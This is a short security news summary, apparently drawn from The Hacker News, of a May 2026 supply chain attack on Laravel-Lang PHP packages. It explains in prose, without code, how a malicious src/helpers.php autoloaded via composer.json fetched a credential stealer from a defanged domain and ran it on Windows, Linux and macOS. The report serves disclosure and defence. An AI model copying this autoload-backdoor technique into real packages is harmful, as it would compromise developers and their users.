A software supply chain attack targeted multiple PHP packages in the Laravel-Lang ecosystem to deliver a credential-stealing framework. Many versions were published in rapid succession, indicating automated mass tagging or republishing and suggesting compromise of organization-level release processes or credentials. Malicious functionality was embedded in src/helpers.php within the published package tags. The file fingerprints the infected host and contacts flipboxstudio[.]info to retrieve a PHP-based cross-platform payload. On Windows, a Visual Basic Script launcher is delivered and executed via cscript, while Linux and macOS execute the stealer payload via exec(). Because src/helpers.php is registered in composer.json under autoload.files, the backdoor runs automatically on every PHP request. A per-host marker based on an MD5 hash prevents repeated execution on the same machine.
"The timing and pattern of the newly published tags point to a broader compromise of the Laravel Lang organization's release process, rather than a single malicious package version. The tags were published in rapid succession on May 22 and May 23, 2026, with many versions appearing only seconds apart."
"The core malicious functionality is located in a file named "src/helpers.php" that's embedded into the version tags. It's mainly designed to fingerprint the infected host and contact an external server ("flipboxstudio[.]info") to retrieve a PHP-based cross-platform payload that runs on Windows, Linux, and macOS."
"Because this file ['src/helpers.php'] is registered in the composer.json under autoload.files, the backdoor is executed automatically on every PHP request handled by the compromised application. The script generates a unique per-host marker (an MD5 hash combining the directory path, system architecture, and inode) to ensure the payload only triggers once per machine."
"According to Aikido Security, the dropper delivers a Visual Basic Script launcher on Windows and runs it via cscript. On Linux and macOS, it executes the stealer payload via exec()."
Read at The Hacker News
Unable to calculate read time
Collection
[
|
...
]